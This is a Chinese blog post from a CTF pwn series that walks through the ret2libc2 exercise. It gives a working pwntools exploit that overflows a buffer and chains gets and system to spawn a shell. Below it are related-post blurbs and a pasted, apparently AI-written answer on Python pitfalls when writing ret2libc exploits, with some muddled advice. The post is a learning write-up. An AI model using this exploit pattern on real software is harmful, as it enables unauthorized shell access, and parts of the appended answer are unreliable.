基本ROP之ret2libc2

最新推荐文章于 2025-05-22 23:29:11 发布

真珠柚子

最新推荐文章于 2025-05-22 23:29:11 发布

阅读量146

点赞数 1

分类专栏： pwn 文章标签： linux 运维服务器

本文链接：https://blog.csdn.net/qq_62539372/article/details/129915236

版权

pwn 专栏收录该内容

8 篇文章

订阅专栏

检查保护机制只开了堆栈不可执行

gdb调试elf文件查看plt表发现有system的plt表项，需要我们自己调用gets函数来读取字符串'/bin/sh'

考虑一下这个字符串写哪里

用vmmap查看一下权限

0x804a000~0x804b000有write权限都能写

from pwn import *
context(log_level='debug',amd='i386',os='linux')
p=process('./ret2libc2')
system_add=0x8048490
gets_add=0x8048460
pop_bx=0x0804843d
bin_sh=0x804a10
payload=b'a'*112+p32(gets_add)+p32(pop_bx)+p32(bin_sh)+p32(system_add)+p32(0000)+p32(bin_sh)
p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()

p32(gets_add)+p32(pop_bx)+p32(bin_sh)+p32(system_add)+p32(0000)+p32(bin_sh)

这儿着实费解

gets读取的字符串放在bx寄存器中的存的地址，然后返回地址system，system的返回地址，/bin/sh的返回地址就酱理解吧！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

真珠柚子

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ROP和Ret2libc漏洞

qq_67812668的博客

08-12

1078

ROP全称为Return-oriented Programming（返回导向式编程）是一种新型的基于代码复用技术的攻击，攻击者从已有的库或可执行文件中提取指令片段，构建恶意代码。 ROP攻击同缓冲区溢出攻击，格式化字符串漏洞攻击不同，是一种全新的攻击方式,它利用代码复用技术。

[PWN][高级篇]ROP-ret2libc-32/64位实例（共四个）

网络安全知识分享

03-28

5742

ROP-ret2libc-32实例 32位思路： 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下：接下来我们检查保护我们看到是有NX保护，没有canary和pie保护，我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt

参与评论您还未登录，请先登录后发表或查看评论

pwn基本ROP——ret2libc

turtlesd的博客

04-26

3009

ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表在进行ret2libc学习之前，我们需要先了解一下PLT表与GOT表的内容。 Globle offset table（GOT)

基本ROP之ret2libc3

至臻求学，胸怀云月

02-15

6762

ret2libc思路 ret2libc就是控制函数的执行libc中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system("/bin/sh")，因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类：程序中自身就含有system函数和"/bin/sh"字符串程序中自身就有s...

ROP-Ret2Libc概述和利用

fanghuapyk的博客

03-19

1630

ret2libc简介 ret2libc就是控制函数的执行libc中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system("/bin/sh")，因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类：程序中自身就含有system函数和"/bin/sh"字符串程序中自身就有system函数，但是没有"/bin/sh"字符串程序中自身就没有system函数和"/bin/sh"字符串，但给

ROP之ret2libc

酉酉的博客

06-03

1846

ROP之ret2libc 修改返回地址，让其指向内存中已有的某个函数当函数调用栈的没有执行权限时，就不能执行我们自己写入的shellcode,就利用程序里或系统里的函数，libc动态链接库中通常就有需要的函数，如system() payload结构通过溢出覆盖返回地址（相当于call system） padding + system address 调用system时的返回地址，可...

浅谈ROP-ret2libc原理-题目源于[ctfwiki]

pointerr的博客

12-18

1049

rop：在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。–[ctfwiki] 传送门之前提到的ret2syscall，提到了静态链接，而libc主要利用了动态链接。 0x01 知识点：简单来说，静态链接就是直接在原有的基础之上进行访问，而动态链接就是直接放上一个链接来访问。 1.plt表和got表拿一个c语言编写的printf函数为例，当调用printf函数时，先去plt表和got表寻找printf函数的真实地址。plt表指向

rop之ret2libc

温和的跳跃

02-04

347

发现很久没有看那些理论还忘记了。理论还是有用得看看的。 ROP例子还是https://www.zhihu.com/search?type=content&q=x86%20ROP这个我回顾一下ret2libc （本身就不熟悉： ret2libc 全称是returnlibc.so 意思是跳转到libc.so这里 .so结尾在linux是代表动态链接库里面包含很多函数，当程序运行到需要链接的地方就会加载进来。为什么要使用这种办法呢，当程序开启DEP（data execute preve..

ret2libc

m0_62280492的博客

09-03

1184

ret2libc

[PWN][高级篇]ROP-ret2libc基础知识

网络安全知识分享

03-27

2195

ROP-ret2libc基础知识前提知识准备Linux延时绑定机制Linux演示绑定机制的实现延迟绑定对我们有什么意义libc函数在哪？ret2libc使用条件如何使用libcplt表和got表的关系整体的跟踪前提知识准备 Linux延时绑定机制动态连接的程序调用了libc的库函数，但是libc在运行才被加载到内存中，调用libc函数时，才解析出函数在内存中的地址，为了帮助程序更好的利用内存空间，不用每次把所有的函数真实地址都写进去，用到哪个查哪个，之后在使用就会很方便。 Linux演示绑定机制的实现

ROP之ret2alsolve(32位)详解

zhuo1358的博客

06-18

886

这几段的关系是这样的，通过link_map_obj定位.dynamic段，在通过偏移定位到.rel.plt段，.dynstr段，.dynsym段，这里的偏移程序会给，不用我们操心，然后再通过realoc_index来确定.rel.plt段对应的函数结构体，从而找到对应函数的got表位置，再通过(r_info

[CTF]PWN--新人入门第一关--Ret2libc

2301_79880752的博客

02-29

1621

首先我们需要找到pop rdi|ret这个指令在程序中的位置（前面提到该指令为程序中自带的，只不过需要我们去寻找），然后让程序返回到pop rdi|ret这个指令上去执行它，通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址，其中ROPgadget为一个插件，需要自己下载，binary意思为一个二进制文件，后面跟着的是文件名，only后面跟着的为要搜索的命令地址。

64位linux系统：栈溢出+ret2libc ROP attack

Zhangmii的博客

06-03

2495

一．实验要求栈溢出+ ret2libc ROP 操作系统：Ubuntu 16.04 64bit 安全机制：不可执行位保护，ASLR（内存地址随机化）打开安全机制，确保×××能绕过以上安全机制，利用漏洞完成attack，实现基本目标：调用system(“/bin/sh”)，打开shell。二．实验概述ret2libc（return-into-libc）是一种利用缓冲区溢出的代码复用技术，主要通过...

Linux rpmsg源码分析

小伟的博客

05-18

746

RPMsg是利用通道进行数据通信，先用 /dev/rpmsg_ctrl0 设备通过ioctrl生成端点，然后使用生成的端点进行通讯名称服务，VIRTIO_RPMSG_F_NS 宏，不开启就不使用名称服务，使用就需要m核心先发送信息才可以注册设备m核心LinuxRPMsg内核驱动框架涉及到RPMsg框架、virtio框架、remoteproc子系统和mailbox子系统mailbox，驱动开发者可自我注册client生成设备提供APP层直接进行核间通信分析物理层，创建virtio dev。

【Linux】借助gcc源码修改，搜索头文件当前进展

最新发布

05-22

166

在使用修改源代码编译的GCC，进行编译内核源代码时，好像性能要慢不少，有可能是打印日志操作有文件IO导致，也有可能是gcc编译的会不会不是release版本不太对，不太清楚。从上图可以看出对于每次的搜索，都是从第一个目录开始搜索，图里也可以看到修改源代码所在的目录，函数，行，昨天的博客感觉对于找到的位置还是不太好。其实，linux内核在编译时和链接时所使用的源代码不一定相同，也即编译能通过，但是链接会报缺少文件这类问题，下一步想找找链接时对于源文件搜索。这里也有一些gcc系统头文件目录搜索。

【Linux】简易版Shell实现（附源码）

2301_80955819的博客

05-18

1823

本文介绍了如何基于Linux进程控制接口实现一个简易的Shell。首先分析了Bash的工作流程，包括打印命令行提示符、获取用户输入、解析命令行、执行命令等步骤。接着，通过代码实现了命令行提示符的打印、用户输入的获取以及命令行的解析。具体实现中，使用getenv函数获取环境变量中的用户名、主机名和路径，并通过fgets读取用户输入的命令行，最后使用strtok函数对命令行进行分割，提取出命令和参数。该简易Shell虽然功能简单，但有助于深入理解Shell的工作原理。

Linux 搭建FTP服务器(vsftpd)

Stringzhua的博客

05-22

987

或者修改/etc/selinux/config文件，将SELINUX=enconfig改为SELINUX=disabled，然后重启系统。在Linux上查看，发现已经有了scptoserver.txt文件，说明文件复制到服务器成功！默认即可，如果有需要可以修改/etc/ssh/sshd_config文件。scp 本地文件 user@远程服务器IP:/远程目录/在win10使用git的bash窗口上传文件到Linux。scp root@远程服务器ip:/远程文件本地目录/

Linux（2）——shell原理及Linux中的权限

2301_80065652的博客

05-18

733

该提示是说你没有被超级用户（root）添加到信用列表（sudoers）当中，所以该条指令的权限得不到提升（你可以想想嘛，怎么可能让一个普通用户随意更改另一个普通用户的密码），只有当你被超级用户添加到信任列表后，你才拥有提升当前指令权限的能力。但实际上你会发现，你所创建出来的文件和目录的权限值往往不是我们所翻译出来的值，原因就是创建文件和目录的时候还要受到umask的影响，假设默认权限是mask，则实际创建出来的文件权限是：mask&(~umask)(2)将核心处理的结果返回给给用户。

为什么做ret2libc的题，python会坏

04-03

<think>嗯，用户问为什么在做ret2libc的题目时，Python会坏。首先，我需要理解用户的问题场景。Ret2libc是一种常见的栈溢出攻击技术，通常用于绕过NX（不可执行堆栈）保护。用户可能在编写利用脚本时使用Python，但遇到了问题，比如脚本崩溃或者无法成功利用漏洞。接下来，我需要考虑Python在漏洞利用中的常见问题。Python的输入处理可能有问题，比如使用`input()`函数而不是`sys.stdin.read()`或者`os.read()`，导致输入不完整或者被缓冲。此外，Python的字符串处理可能引入空字符，截断payload，尤其是在使用`send`或`sendline`方法时，`sendline`会自动添加换行符，可能破坏payload结构。另一个方面是子进程的交互问题。使用pwntools库时，如果没有正确处理进程的输入输出缓冲，可能导致竞争条件，使得payload没有被及时接收。此外，环境变量差异也可能影响地址布局，比如本地和远程环境的不同导致libc地址计算错误。还有Python版本的问题，比如在Python 3中字符串是Unicode，而二进制数据需要正确编码为bytes，否则会导致类型错误。工具链的版本也可能影响，比如pwntools的API变化或存在bug。用户可能是在编写脚本时遇到了这些具体问题，导致exploit失败，误以为是Python的问题。需要逐一排查这些可能性，比如检查输入方法是否正确处理二进制数据，确保payload中没有意外字符，处理子进程的缓冲，统一环境变量，以及确认Python版本和库的兼容性。总结来说，问题不在于Python本身，而是在使用Python编写脚本时需要注意的一些细节。需要指导用户检查输入输出处理、payload构造、环境一致性等方面，确保每个步骤都正确无误。</think>在CTF Pwn题型中进行ret2libc攻击时，使用Python编写exp脚本可能遇到"坏"的情况（如程序崩溃或无法getshell），主要与以下技术细节相关： 1. **输入处理差异** - Python的`input()`函数会默认添加换行符（`\n`） - 二进制payload中的`\x00`可能被字符串处理函数截断 - 正确做法：使用`sys.stdout.buffer.write()`或`pwntools`的`send()`/`sendline()` 2. **进程交互时序问题** ```python # 错误示例（未处理缓冲） p = process('./vuln') p.send(payload) # 可能未及时到达程序 # 正确做法（pwntools推荐） p = process('./vuln') p.send(payload) p.recvuntil('>') # 等待特定交互节点 ``` 3. **地址对齐问题** - Python的struct.pack可能产生意外对齐 - 对比C语言直接内存操作： ```c // C语言直接构造payload memcpy(buffer, "\x7f\x45\x4c\x46", 4); ``` 4. **环境变量污染** ```bash # 本地环境变量可能影响libc地址 env -i LD_PRELOAD=./libc.so.6 ./vuln ``` Python脚本中必须显式指定环境： ```python p = process(env={'LD_PRELOAD':'./libc.so.6'}, argv=['./vuln']) ``` 5. **编码转换问题（Python3特有）** ```python # 错误示例（混淆bytes和str） payload = b'A'*40 + addr # addr若是int会报错 # 正确转换方式 from pwn import * payload = flat([ b'A'*40, libc.address + 0x1234 # pwntools自动转换 ]) ``` **解决方案建议：** 1. 使用`pwntools`库而非纯Python实现 2. 在payload构造中显式指定字节类型 ```python rop.raw(bytes.fromhex('deadbeef')) ``` 3. 处理标准输入输出时关闭缓冲 ```python p = process(stdin=PTY, stdout=PTY) # 强制伪终端模式 ``` 4. 通过`gdb.attach(p)`实时调试内存状态通过注意这些系统级交互细节，Python仍然可以稳定完成ret2libc攻击。关键是要理解底层机制而非单纯依赖高级语言的抽象。